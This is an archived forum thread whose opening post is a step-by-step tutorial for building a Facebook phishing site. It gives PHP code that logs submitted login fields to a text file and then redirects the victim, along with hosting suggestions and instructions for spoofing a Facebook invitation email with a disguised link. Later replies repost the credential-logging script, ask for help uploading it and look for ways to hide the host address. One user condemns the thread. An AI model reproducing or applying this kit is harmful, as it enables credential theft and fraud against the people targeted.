PDA

View Full Version : How to: Phish / Spoof FACEBOOK! (with pictures)

g1tha741741
10-27-2008, 02:47 PM
I DINT MAKE DIS !!!!!!

How to: Phish / Spoof FACEBOOK! (with pictures)

how can i hackfacebook? why doesnt my phisher work? how can i send my phisher?

Now im gonna make a step by step tutorial for facebook accounts.
WITH PICTURES!!!

ONE!:
go to "www.facebook.com/login.php" and right click on some white space on the page and press "view source code". ALOT of text is gonna appear, copy it all to notepad.

TWO!:
Now we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So press Edit >> search. and search "action=" without the quotes. you should find this
http://img354.imageshack.us/img354/7116/screen1pf8.png
The big red ring that circles the "action=" you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as "index.PHP" (not htm!)

THREE!:
Now that we changed the action to next.php, we should also make a "next.php". open up notepad again. And write this::<?php
header("Location: http://www.facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>Save this as "next.php"

Note: for security you should rename "passwords.txt" to something else.
now make a text file called "passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank.

FOUR!:
Upload the 3 files "index.php", "next.php" and "passwords.txt" (or whatever the password file is called) to a subdomain hosting site. THEY MUST SUPPORT .PHP! i suggest these: 110mb.com, t35.com or 007sites.com. When you made an account you should upload the 3 files.

Congratz. You have yourself a working Phisher site!

FIVE!:
now we would like to send spoof emails out. To do that we should first make an email account. which starts with facebook@. or something that looks alike. like this [email protected] or something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this "[email protected]" soemthing like that. but eventually that would cost. When your email is set go to step six.

SIX!:
Copy the content of an original Facebook friendship invitation email and paste it into a new mail. DONT SENT YET!
remove the hyperlink from this link:
http:/www.facebook.com/n/?reqs.php
Mark it and push the Add hyperlink button
http://img117.imageshack.us/img117/6243/screen2jj5.png
Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. Thats pretty kewl. Now i belive your ready to send your spoof emails to everybody you know. and hopefully some of them will fall for it.

g1tha741741
10-27-2008, 05:41 PM
onna damma :D

Gamerz9
10-27-2008, 09:34 PM
haha frm H4U? Stolen Tutorial?

dragz
03-28-2009, 08:21 AM
Well, now I gotta fight with google spam filter.

RazorH
03-28-2009, 08:35 AM
ela.. ela.... tnx

keveen
03-28-2009, 08:41 AM
Balamu

Jack_Sparrow
03-28-2009, 08:43 AM
haaa haa haa
owa oneee neee phishing walata hadapu index files tiyanawa
ewa kohe hari host kalama ethi ;)
eke log ekee baba wage pass tika tiyanawa :P

Pentagram
03-28-2009, 08:50 AM
haaa haa haa
owa oneee neee phishing walata hadapu index files tiyanawa
ewa kohe hari host kalama ethi ;)
eke log ekee baba wage pass tika tiyanawa :P
:dull: umbala nam maha chaa! :P:P

Jack_Sparrow
03-28-2009, 08:52 AM
:dull: umbala nam maha chaa! :P:P

:no::no::no::no:
mama FB phish karala nee banz
dananwa unata karanna yanne neee

Pentagram
03-28-2009, 08:55 AM
:no::no::no::no:
mama FB phish karala nee banz
dananwa unata karanna yanne neee :oo: apiatath mehema karai ehenam! :eek:..... :P :P

acsakvith
03-28-2009, 09:01 AM
Owa gon weda...

apinam ahuwei owata...

But ban netwrk, IT gena nodanna aya ahuwenawa nea..
Apita mokatada ban anunge privacy ekak...

flokerzo
10-28-2009, 12:22 AM
:cool:

Hi to everyone.

Since am new here meybe something i didnt get , Thread I can't upload next.php on t35.com ? why it gives me this error masseg, here is the code.

:<?php
header("Location: ");
$handle = fopen("masdud.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

yh i change password.php to masdud.php

and error masseg is : File next.php could not be transferred to the FTP server

what I did wrong please ?

OptiplexFx
10-28-2009, 09:10 AM
You are such a looser. Get a life man! Don't be such a nuisance to others! I reported this post, and I advice others to do the same. :growl::growl:

SpyBlaster
06-01-2011, 12:54 AM
i'm already using this kind of script ... which is done by myself.. but the only problem i have is hiding the real adress of the location where the script is hosted and showing out an fake path.... still struggling to do this... for months m fiding a method to do so.. still m not lucky enuff... kawru hari dannawa nam mata PM ekak dandoooo